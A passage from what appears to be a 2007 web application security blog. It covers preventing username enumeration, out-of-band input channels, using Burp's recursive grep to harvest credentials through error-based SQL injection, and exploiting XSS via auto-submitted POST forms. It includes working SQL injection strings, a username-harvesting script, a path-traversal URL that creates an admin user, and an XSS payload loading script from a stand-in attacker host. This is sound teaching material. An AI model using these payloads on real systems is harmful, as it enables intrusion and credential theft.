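print(parts.path)       # /admin/newUser.php -- the ../ swallows /images/
print(parts.query)      # username=daf2&password=0wned&role=admin
print(parts.fragment)   # .gif -- never sent to the server
```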

Sunday, April 22, 2007

Preventing username enumeration

Most people know how to do username enumeration, but not everyone knows how to prevent it. Indeed it is often asserted, incorrectly, that eliminating username enumeration altogether cannot be achieved.

The first step in preventing username enumeration in an application is to identify all of the relevant attack surface. This includes not only the main login but also all of the more peripheral authentication functionality such as account registration, password change and account recovery. It is very common to encounter applications in which username enumeration is not possible in the main login function, but can be trivially performed elsewhere.

The second step is to ensure, in every piece of relevant functionality, that the application does not provide a means for an attacker to confirm the validity or otherwise of an arbitrarily chosen username. This is not just a matter of fixing obvious failure messages such as "username incorrect" vs. "password incorrect", but also of checking every aspect of the application's behaviour. For example, if the same literal on-screen failure message is generated by different code paths, then subtle differences may arise within the HTML source. Alternatively, the application may manifest timing differences when processing valid and invalid usernames, because different database queries and computational operations are performed when a valid username is supplied.
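One way to flatten out both the message differences and the timing differences is to force every login attempt down the same code path, including the expensive password-derivation step. A minimal sketch, in which the hashing parameters and store layout are illustrative only:

```python
import hashlib, hmac, secrets

def derive(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_user(password: str):
    salt = secrets.token_bytes(16)
    return salt, derive(password, salt)

USERS = {"alice": make_user("s3cret")}       # illustrative user store
DUMMY = make_user(secrets.token_hex(16))     # burned when username is unknown

def login(username: str, password: str) -> str:
    # Unknown usernames pay the same derivation cost as valid ones
    salt, stored = USERS.get(username, DUMMY)
    supplied = derive(password, salt)
    valid = hmac.compare_digest(supplied, stored) and username in USERS
    # One generic message covers both failure cases
    return "Welcome" if valid else "Invalid username or password"
```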

Of the various points of attack surface, account registration functionality can seem to be the most difficult area in which to eliminate username enumeration. If an existing username is chosen, surely the application must reject the registration attempt in some manner, enabling an attacker to infer which usernames have been registered? Using CAPTCHA controls and other hurdles may slow down the process, but they do not prevent it.

In fact, there are two ways in which an account registration function can be implemented which avoid introducing enumeration vulnerabilities:
  • The application can specify its own usernames. When an account applicant has supplied their required details and initial password, the application generates a unique username for them. Of course, to avoid a different type of vulnerability, the usernames generated should not be predictable.

  • The application can use email addresses as usernames. The first step of the registration process requires the applicant to supply their email address, to which a message is then sent. If the username is not yet registered, the message contains a one-time URL which can be used to complete the registration process. If the username is already registered, the message informs the user of this, and perhaps directs them towards the account recovery function. In either case, an attacker can only verify a username's status if they control the relevant email account.
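The second approach takes only a few lines to sketch. Here the outbox stands in for a real mail delivery system, and the URL scheme is made up:

```python
import secrets

OUTBOX = []                          # stands in for a real mailer
REGISTERED = {"alice@example.com"}   # illustrative existing accounts
PENDING = {}                         # token -> email awaiting confirmation

def send_email(to: str, body: str):
    OUTBOX.append((to, body))

def begin_registration(email: str) -> str:
    if email in REGISTERED:
        send_email(email, "You already have an account; try account recovery.")
    else:
        token = secrets.token_urlsafe(32)
        PENDING[token] = email
        send_email(email, f"Finish signing up: https://example.com/register/{token}")
    # The on-screen response is identical whether or not the address was taken
    return "Check your email to continue registration."
```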

Wednesday, April 11, 2007

Out-of-band input channels

When we think about attacking web applications, it is natural to focus on the core means by which we can interact with a target application - that is, using HTTP requests generated by a web browser or other client software. In many applications, however, there are other channels through which we can introduce our input into the application’s processing. These out-of-band channels represent a significant, and often buggy, area of attack surface.

Here are some examples in applications which I have encountered:

  • Web mail applications, in which data received via SMTP is processed by the application and ultimately rendered in-browser to other users.

  • A web interface to a network monitoring solution, in which data sniffed off the wire in a large number of different protocols is collated by the application and displayed in various forms.

  • Portal applications which use RSS mash-ups to render data retrieved from third parties.

  • A web authoring application which allows users to import external web pages by specifying a URL; the application retrieves these via HTTP and processes the contents.

Another example, which I have not encountered and which probably falls into the category of bar-room apocrypha, concerned an application used to process the photographed images of speeding motorists. Reputedly, the application used OCR to read the car’s registration number, and placed this into a SQL query to update its records. Of course, it was vulnerable to SQL injection, but this could only be exploited by printing your attack string onto a registration plate and then driving quickly past a camera. Furthermore, the bug was completely blind, with minimal opportunities for retrieving the results of an arbitrary query. It was mooted that time delays might provide a solution - for example, by triggering very long conditional delays and monitoring the time taken to receive a ticket. However, with only 12 available points on your license, retrieving one bit of data at a time is unlikely to succeed. In this situation, therefore, perhaps the most effective PoC attack string would be:

'; drop table offenders--

Thursday, April 5, 2007

Using recursive grep for harvesting data

Talking to someone the other day I realised that even many experienced users of burp don’t know what the "recursive grep" payload source is used for.

This payload source is different from all the others, because it generates each attack payload dynamically based upon the application’s response to the previous request. In some situations, this can be extremely useful when extracting data from a vulnerable application.

A typical situation is where you have an SQL injection bug that enables you to retrieve a single item of data at a time. To extract the entire contents of a table, you can use recursion to extract each value in turn on the basis of the previous value. For example, suppose you are attacking an MS-SQL database and have enumerated the structure of the table containing user credentials. Supplying the following input returns an informative error message containing the username which appears alphabetically first in this table:

' or 1 in (select min(username) from users where username > 'a')--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'abigail' to a column of data type int.

This gives you the username 'abigail', which you can place into your next input to retrieve the username which appears alphabetically second:

' or 1 in (select min(username) from users where username > 'abigail')--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'adam' to a column of data type int.

To extract all usernames, you can continue this process, inserting each discovered username into the next request until no more values are returned. However, performing this attack manually may be very laborious. You could write a script to do it in a few minutes. Or, in a few seconds, you can configure the "recursive grep" function to perform the attack for you.
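For the record, the few-minutes script looks something like this. To keep the sketch self-contained, the vulnerable application is simulated by a local function; in reality you would send the injection request over HTTP and read back the error page:

```python
import re

# Simulated back end: returns the ODBC error produced by the query
#   select min(username) from users where username > '<value>'
USERS = sorted(["abigail", "adam", "brian", "claire"])

def vulnerable_response(value: str) -> str:
    nxt = next((u for u in USERS if u > value), None)
    if nxt is None:
        return "Generic error page"
    return ("[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error "
            f"converting the nvarchar value '{nxt}' to a column of data type int.")

# The recursive-grep loop: feed each extracted value into the next request
PATTERN = re.compile(r"converting the nvarchar value '([^']*)'")
harvested, current = [], "a"
while True:
    match = PATTERN.search(vulnerable_response(current))
    if not match:
        break
    current = match.group(1)
    harvested.append(current)

print(harvested)   # ['abigail', 'adam', 'brian', 'claire']
```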

The first step is to capture the vulnerable request in burp proxy, and choose the "send to intruder" action. Then type your attack string into the vulnerable field, and position the payload markers around the part which you need to modify:

Next, in order to use "recursive grep" as a payload source, you need to configure "extract grep" to capture the username which is disclosed in each response. To do this, you tell intruder to capture the text following the error message

Syntax error converting the nvarchar value '

and to stop capturing when it reaches a single quotation mark:

Finally, you need to select the "recursive grep" payload source, select the single "extract grep" item you have configured, and specify the first payload as 'a':

That's it! Launching the attack will cause intruder to send 'a' in the first request, and in each subsequent request send the username which was extracted from the previous error message. Within seconds, you can dump out all of the usernames in the table:

You can select save/results table to export the username list. Equipped with this list, you can then use it as a conventional payload source to retrieve all of the passwords and other data, for example using requests of the form:

' or 1 in (select password from users where username = 'abigail')--

There are other cases where recursive grep can be useful, but this kind of attack was the one I mainly had in mind when I wrote it.

Thursday, March 29, 2007

Exploiting XSS in POST requests

One good question I was asked in Amsterdam was whether it is possible to exploit a reflected cross-site scripting bug that can only be triggered via a POST request. The answer, of course, is "yes".

There are plenty of delivery mechanisms for reflected XSS attacks, only some of which involve inducing a victim to click on a crafted URL. For example, an attacker can create an innocuous looking web page containing an HTML form with the required fields, and a script which auto-submits the form:

<form name=TheForm action=http://vuln-app/page.jsp method=post>
<input type=hidden name=foo value=&quot;&gt;&lt;script&#32;src=http://attacker/bad.js&gt;&lt;/script&gt;>
</form>
<script>document.TheForm.submit();</script>

Rather than creating his own web site, the attacker could of course inject the above attack into a third-party application via a stored XSS bug. The form is submitted cross-domain (as in a cross-site request forgery attack), but the resulting payload executes within the security context of the vulnerable application, enabling the full range of standard XSS attack actions to be performed.

Monday, March 19, 2007

Black Hat Europe

I'm going to be co-presenting a training course in Amsterdam next week. Though I say it myself, the course should be pretty fun. As well as all the usual web app stuff, we're going to cover some more entertaining hacks like reversing Java applets and Flash. If you want to know how to cheat at online poker whilst you're supposed to be doing a pen test, this course is perfect for you. Anyone who happens to be there, please do come and say hello.

Saturday, March 10, 2007

Hello world

I realise that this may be somewhat late in the day to be starting a blog about web application security, especially given that you would expect all of that stuff to have been sorted out by now. But two pertinent facts are that (a) I am prone to prolonged periods of inactivity; and (b) I will shortly have a new book to promote. There is certainly still much to say that is interesting and even fun, so please expect future posts to be rather more noteworthy than this one. In the meantime, hello web app world.